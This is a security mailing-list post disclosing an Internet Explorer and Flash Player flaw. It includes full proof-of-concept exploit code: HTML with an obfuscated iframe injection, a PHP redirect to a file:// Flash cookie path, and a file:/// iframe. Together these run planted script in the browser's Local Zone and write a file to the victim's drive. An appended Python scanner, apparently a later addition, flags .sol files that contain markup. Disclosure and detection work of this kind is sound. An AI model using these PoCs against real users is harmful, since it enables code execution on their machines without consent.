After I reported the Content-Location Vulnerability (http://www.securityfocus.com/archive/1/342317), Thor Larholm explained that the HTML execution was not caused by the Content-Location header, but instead by the triple slash (file:///). I have tested it with double slash and I even tested the triple slash without the Content-Location header, but neither worked. The difference between triple slash and double slash is that in triple htm.html loads the cookie in the iframe, and with double slash it causes the whole page to try and load the cookie, which would then require the user to press Back and then refresh the page. I have created 2 proof-of-concepts which show how both vulnerabilities can not be exploited separately.

1. http://mlsecurity.com/ie/wee.php

This page will create a flash cookie and when you press continue it will load htm.html which contains an iframe. This iframe will load red.php which contains the Content-Location header pointing at the flash cookie. The flash cookie location will only have a double slash (file://).

wee.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol

htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>
document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D" + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + "%22%3E%3C/iframe%3E"));
</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like my_Array0Sven1kelor2.
<p>
The script assumes you are under windows 2000/XP logged on as administrator.<br>
If you are not logged on as administrator type the username you're logged in under in the box below and press Go Go Go.<p>
<form method="GET">
Logged on to windows as user: <input type=text name="a" value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>
<p>
This should create a file called mlsecurity.txt in your c:\ drive.
<p>
<a href="exp.php">How it works?</a>
</html>
******************************

red.php
******************************
<?php
// Username and drive come from the query string written by htm.html;
// fall back to the defaults when they are missing or JavaScript passed "undefined".
$a = $_GET["a"];
if(!$a || $a=="undefined") { $a="administrator"; }
if($_GET["drive"] && !strstr($_GET["drive"],"unde")) { $d=$_GET["drive"]; } else { $d="C"; }
// Redirect the iframe to the flash cookie using a double-slash file:// URI.
header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");
?>
******************************

2. http://mlsecurity.com/ie/ie.php

This proof-of-concept only uses the triple slash method to open the cookie in an iframe.

ie.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol

htm2.html
******************************
<html>
<iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe>
<p>
Note: you might need to edit the html to fit your system.
<p>
Macromedia Flash Player is reported to store Flash cookies (.sol files) in a predictable location on client systems. Other attacks are possible given the ability to store content on a system in a predictable location, such as referencing the content via a file:// URI. This is compounded by the fact that an attacker could include HTML and script code in the cookie, which may be interpreted by Internet Explorer or possibly other browsers. In the example of Internet Explorer, such content would be interpreted in the context of the Local Zone. Successful exploitation would still require the attacker to guess the local username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft Windows operating systems. Other versions may also be affected. Macromedia Director MX is similarly affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has been determined to be a distinct issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with additional technical details describing a new issue in Internet Explorer. The original report for these issues was a proof-of-concept provided by Mindwarper which exploited both of the issues simultaneously.
<p>
- Discovered by Mindwarper<br>
</html>
******************************

I have tested these pages on both win2k sp4 ie6 fully patched and on winXP. I even tried using a few IE hacks and it still worked.

-----------------------------|
- Mindwarper                 |
- mindwarper@linuxmail.org   |
- http://mlsecurity.com      |
-----------------------------|
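A defender-side check for the poisoned-cookie condition the advisory text above describes, added here as an example that is not part of the original post: it walks a Flash Player shared-object directory and flags .sol files that carry HTML or script markers, which a file:/// iframe could otherwise render in the Local Zone. The directory layout, the two sample .sol bodies and the marker list are constructed assumptions, not Macromedia's or Microsoft's logic.

```python
"""Scan Flash Player shared-object (.sol) files for embedded HTML/script.

Added example, not code from the original post. It assumes a per-site
directory layout like the one the post describes and uses a constructed
set of markup markers; the .sol header bytes below are approximate samples.
"""
import re
import tempfile
from pathlib import Path

# Markers that have no business inside a Flash cookie. If a .sol file
# contains them, a browser opening it via file:/// may interpret them.
_MARKUP = re.compile(
    rb"<\s*(html|script|iframe|object|embed|img|body)\b|javascript:",
    re.IGNORECASE,
)


def looks_like_markup(data: bytes) -> bool:
    """Return True if the raw .sol bytes contain HTML or script markers."""
    return _MARKUP.search(data) is not None


def scan_sol_dir(root: Path) -> list:
    """Recursively scan ROOT for .sol files; return flagged paths relative to ROOT."""
    flagged = []
    for sol in sorted(root.rglob("*.sol")):
        if looks_like_markup(sol.read_bytes()):
            flagged.append(sol.relative_to(root).as_posix())
    return flagged


def demo() -> list:
    """Build a constructed Flash Player directory, scan it, return flagged files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed benign cookie: approximate TCSO header plus a plain setting.
        benign = root / "example.com" / "settings.sol"
        benign.parent.mkdir(parents=True)
        benign.write_bytes(b"\x00\xbf\x00\x00\x00\x20TCSO\x00\x04\x00\x00\x00\x00"
                           b"\x00\x08settings\x00\x00\x00\x00\x06volume\x00?\xf0")
        # Constructed poisoned cookie: markup stored where a file:/// load would render it.
        bad = root / "attacker.invalid" / "poison.sol"
        bad.parent.mkdir(parents=True)
        bad.write_bytes(b"\x00\xbf\x00\x00\x00\x40TCSO"
                        b"<html><script>/* constructed sample */</script></html>")
        return scan_sol_dir(root)  # returns ["attacker.invalid/poison.sol"]
```

Point `scan_sol_dir` at the real "Macromedia/Flash Player" profile directory to audit a host; a hit is a reason to delete the cookie and check which site wrote it.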